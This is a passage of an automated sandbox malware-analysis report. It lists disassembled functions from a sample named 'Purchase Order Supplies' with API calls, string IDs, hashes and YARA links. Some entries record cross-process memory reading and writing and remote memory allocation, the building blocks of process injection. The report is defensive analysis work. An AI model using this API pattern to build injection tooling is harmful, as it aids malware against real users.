                          • CoCreateInstance.COMBASE(00D1DA7C,00000000,00000001,00D1D8EC,?), ref: 00CDFACA
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • CoUninitialize.COMBASE ref: 00CDFD2D
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize_memmove
                          • String ID: .lnk
                          • API String ID: 2683427295-24824748
                          • Opcode ID: 8cd431f9cc365d8d8d76916ba7cac0f65e3159782fd8546b5ea95a3c1f5285af
                          • Instruction ID: 31a225342da8f69bd357c9c089c6d05200cbf76d542366cf310b220cbd00b6a6
                          • Opcode Fuzzy Hash: 8cd431f9cc365d8d8d76916ba7cac0f65e3159782fd8546b5ea95a3c1f5285af
                          • Instruction Fuzzy Hash: 33A16A71504301AFC700EF64C895EABB7EDAF99704F40491DF195D72A2EB70EA09DBA2
                          Function 00CDEFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CD78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00CD78CB
                          • CoInitialize.OLE32(00000000), ref: 00CDF04D
                          • CoCreateInstance.COMBASE(00D1DA7C,00000000,00000001,00D1D8EC,?), ref: 00CDF066
                          • CoUninitialize.COMBASE ref: 00CDF083
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                          • String ID: .lnk
                          • API String ID: 2126378814-24824748
                          • Opcode ID: de2298ffa3b16904193fb397a5dd311f762820d47e100bdcd3eabfa18507efa6
                          • Instruction ID: 38fa957a404cac738a0447f519f35ee9c6dff9c401609b45bc28b2dd7ad62d6f
                          • Opcode Fuzzy Hash: de2298ffa3b16904193fb397a5dd311f762820d47e100bdcd3eabfa18507efa6
                          • Instruction Fuzzy Hash: 26A15635604301AFCB10DF14C884D5ABBE5BF89324F14895DF9AAAB3A1CB31ED46CB91
                          Function 00CADA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID: #$+
                          • API String ID: 0-2552117581
                          • Opcode ID: 8a6b0d722335d5c576eb46037185022952effe6bfdcebe214bd2dc7493900e1f
                          • Instruction ID: cef6b94ba479d77572f3979049cfc1909a5f12cfb9996a7f3478af324d4b8b66
                          • Opcode Fuzzy Hash: 8a6b0d722335d5c576eb46037185022952effe6bfdcebe214bd2dc7493900e1f
                          • Instruction Fuzzy Hash: 84512EB4204246CFDF11EF68D445BFA7BA4AF2A314F184051F9969B2E0D7309D42C734
                          Function 00CD503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00D2DC40,?,0000000F,0000000C,00000016,00D2DC40,?), ref: 00CD507B
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                            • Part of subcall function 00C9B8A7: _memmove.LIBCMT ref: 00C9B8FB
                          • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00CD50FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: BuffCharUpper$__itow__swprintf_memmove
                          • String ID: REMOVE$THIS
                          • API String ID: 2528338962-776492005
                          • Opcode ID: 5ee1b7daa2bdf8c34c1dc5a9f0cc077761d0f850ba312d1efc0d32d66add1e5e
                          • Instruction ID: ac8440b9edff833ff0d56b627e77872708bd4a76906666715b8118ff8d429500
                          • Opcode Fuzzy Hash: 5ee1b7daa2bdf8c34c1dc5a9f0cc077761d0f850ba312d1efc0d32d66add1e5e
                          • Instruction Fuzzy Hash: E541A474A0060AAFCF01DF54C885BAEB7B5BF49304F04806AEA66AB392DB34DD45DF50
                          Function 00CCCF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CD4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CCC9FE,?,?,00000034,00000800,?,00000034), ref: 00CD4D6B
                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00CCCFC9
                            • Part of subcall function 00CD4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CCCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00CD4D36
                            • Part of subcall function 00CD4C65: GetWindowThreadProcessId.USER32(?,?), ref: 00CD4C90
                            • Part of subcall function 00CD4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00CCC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00CD4CA0
                            • Part of subcall function 00CD4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00CCC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00CD4CB6
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CCD036
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CCD083
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                          • String ID: @
                          • API String ID: 4150878124-2766056989
                          • Opcode ID: f849939e60c0584b04f4d8bdeb5946cac2a0c5fe925af65e1c9eb1a9bf045a7f
                          • Instruction ID: 99f343410be3fd584b02797c15b7bd6aaa8ed5a9b4aa4a3f2165aa1b3c112b3d
                          • Opcode Fuzzy Hash: f849939e60c0584b04f4d8bdeb5946cac2a0c5fe925af65e1c9eb1a9bf045a7f
                          • Instruction Fuzzy Hash: 4A412A72900218BFDB14DFA4CC85FDEBBB8AF49700F108099EA56B7291DB706E45DB61
                          Function 00CFA44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                          Download Yara Rule
                          APIs
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00D2DBF0,00000000,?,?,?,?), ref: 00CFA4E6
                          • GetWindowLongW.USER32 ref: 00CFA503
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CFA513
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$Long
                          • String ID: SysTreeView32
                          • API String ID: 847901565-1698111956
                          • Opcode ID: 1c6186cbd9073652548ce66eafa384dead6b71d3f37a0d17acb72bec46bee040
                          • Instruction ID: 0b3b03615f0916ed20c82c2adb0aff11841df862a1db8f13d50741ed6ff2c0e0
                          • Opcode Fuzzy Hash: 1c6186cbd9073652548ce66eafa384dead6b71d3f37a0d17acb72bec46bee040
                          • Instruction Fuzzy Hash: 9C31C071100609AFDB618E38CC45BE6BB69EF49338F248714F979932E0C730E9519B61
                          Function 00CFA698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CFA74F
                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CFA75D
                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CFA764
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$DestroyWindow
                          • String ID: msctls_updown32
                          • API String ID: 4014797782-2298589950
                          • Opcode ID: 77d4122efff41ce7b5fc121bcbfd9b2cb42b4ecff7ed15f5f0f184c929c07237
                          • Instruction ID: 822e661072d8e8e53c5e230b7a602c5ff27e4adb9eb8934a7996f21dc70e8839
                          • Opcode Fuzzy Hash: 77d4122efff41ce7b5fc121bcbfd9b2cb42b4ecff7ed15f5f0f184c929c07237
                          • Instruction Fuzzy Hash: E9212AB9600209BFDB10EF64CCC1EB77BADEB4A394B040459FA159B361CB70ED119A62
                          Function 00CF97B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CF983D
                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CF984D
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CF9872
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$MoveWindow
                          • String ID: Listbox
                          • API String ID: 3315199576-2633736733
                          • Opcode ID: eea81c20dc26e7b4684d296b0f5d25c790353fbdf00b886d4fdb3caba7a4435c
                          • Instruction ID: abf4db2684d318b242c2f2b8f97b057289bd27eba597c8f400141bbc50895986
                          • Opcode Fuzzy Hash: eea81c20dc26e7b4684d296b0f5d25c790353fbdf00b886d4fdb3caba7a4435c
                          • Instruction Fuzzy Hash: 4E21073161021CBFDF119F54CC85FFB3BAAEF8A794F018125FA149B190CA719C1187A1
                          Function 00CFA217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CFA27B
                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CFA290
                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CFA29D
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: msctls_trackbar32
                          • API String ID: 3850602802-1010561917
                          • Opcode ID: b18022ccaeb3d3f8dd5fa4426cc670e3b23abde08e0f27321118e7351650cbac
                          • Instruction ID: 9dd184255ab9f2936f7216775ff5614b2abcd72a80660370ddb8995f2f829855
                          • Opcode Fuzzy Hash: b18022ccaeb3d3f8dd5fa4426cc670e3b23abde08e0f27321118e7351650cbac
                          • Instruction Fuzzy Hash: 791123B120030CBFEB205F61CC46FA77BA8EF89B54F014118FB59A6190C672A851DB21
                          Function 00CB2F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00CB2F79
                          • GetProcAddress.KERNEL32(00000000), ref: 00CB2F80
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RoInitialize$combase.dll
                          • API String ID: 2574300362-340411864
                          • Opcode ID: 78aa8ea8473a0a2fc2bb942a583d8c7a1f0a4a9f1d85bedde5074c610107b90d
                          • Instruction ID: 6f4f18e62b26cae81a54c456b7af335d9ad8b45cdfe517911079c8c92ed0a175
                          • Opcode Fuzzy Hash: 78aa8ea8473a0a2fc2bb942a583d8c7a1f0a4a9f1d85bedde5074c610107b90d
                          • Instruction Fuzzy Hash: 7DE01A746D4B20BFEB105F74EC49FD53A6AAB11787F104024B912D52A0CFB54084DF39
                          Function 00CB3034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00CB2F4E), ref: 00CB304E
                          • GetProcAddress.KERNEL32(00000000), ref: 00CB3055
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RoUninitialize$combase.dll
                          • API String ID: 2574300362-2819208100
                          • Opcode ID: 4e45e1836faea181a4198445fe780cbaae98754d6b23174da058bae2b4a13ac0
                          • Instruction ID: f8ea56de33f546d3689d7e8df46cc8f919ce164b798d952286033a4512e4c5e8
                          • Opcode Fuzzy Hash: 4e45e1836faea181a4198445fe780cbaae98754d6b23174da058bae2b4a13ac0
                          • Instruction Fuzzy Hash: B7E09274688710BFEB209F61BD0DB853A65BB10702F100014F919D12B8DFB845448A36
                          Function 00D0BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: LocalTime__swprintf
                          • String ID: %.3d$WIN_XPe
                          • API String ID: 2070861257-2409531811
                          • Opcode ID: 20445c1577d5dd664a5b3c60d726ae595d072db2fcd7b3ea97634e915fdf9f1e
                          • Instruction ID: 3b9f989dcafe059ea5e594acda7383fccd93747a4923120886c1493fa9c308f6
                          • Opcode Fuzzy Hash: 20445c1577d5dd664a5b3c60d726ae595d072db2fcd7b3ea97634e915fdf9f1e
                          • Instruction Fuzzy Hash: 81E0EC7190C11CFACA5486918C46AFA72BCAB08310F108493B99A92085D775DB58AB31
                          Function 00CAE6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00CAE6D9,?,00CAE55B,00D2DC28,?,?), ref: 00CAE6F1
                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00CAE703
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: IsWow64Process$kernel32.dll
                          • API String ID: 2574300362-3024904723
                          • Opcode ID: 63b2a8d7276d355af1b6671056611826596ab24deec07911f137a43e50d8b3d7
                          • Instruction ID: 5afc0811862e8b4526d441b6001be7cd5196166c5eef5dba4b730ff39033db72
                          • Opcode Fuzzy Hash: 63b2a8d7276d355af1b6671056611826596ab24deec07911f137a43e50d8b3d7
                          • Instruction Fuzzy Hash: 90D0C974540723AFD7246F66E84C6977BE8BF05719B10942AF4A5D2251DBB0C8C58AB0
                          Function 00CAE6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00CAE69C,75730AE0,00CAE5AC,00D2DC28,?,?), ref: 00CAE6B4
                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00CAE6C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetNativeSystemInfo$kernel32.dll
                          • API String ID: 2574300362-192647395
                          • Opcode ID: ae9257134092a5a7c992edaf43591f2d486b33704ea1f64a0eec942b4fe7bdfd
                          • Instruction ID: b593971325e47cb76a89fea8bcb073af81725ebf06ade3cd3ba3cf58c853a0f3
                          • Opcode Fuzzy Hash: ae9257134092a5a7c992edaf43591f2d486b33704ea1f64a0eec942b4fe7bdfd
                          • Instruction Fuzzy Hash: E8D0A774440313AFD7205F31E80865237D4AFA8309B009829F455D1260DB70C4C18670
                          Function 00CEEBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00CEEBAF,?,00CEEAAC), ref: 00CEEBC7
                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CEEBD9
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                          • API String ID: 2574300362-1816364905
                          • Opcode ID: 5d418b4af12172287859dc8897134aa3d9fb430ca86846906ff2f17123e4d0f3
                          • Instruction ID: 7d44467a59d0903ce449dac72b8e1d0e3c6b3adc414b0f3843dee50bffda105b
                          • Opcode Fuzzy Hash: 5d418b4af12172287859dc8897134aa3d9fb430ca86846906ff2f17123e4d0f3
                          • Instruction Fuzzy Hash: C9D0A974404322AFD7205F32E848B8237E8AF04304B20C42AF8AAD2360DFB0D8C08A30
                          Function 00CD13A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00CD1371,?,00CD1519), ref: 00CD13B4
                          • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00CD13C6
                          Strings
                          Memory Dump Source
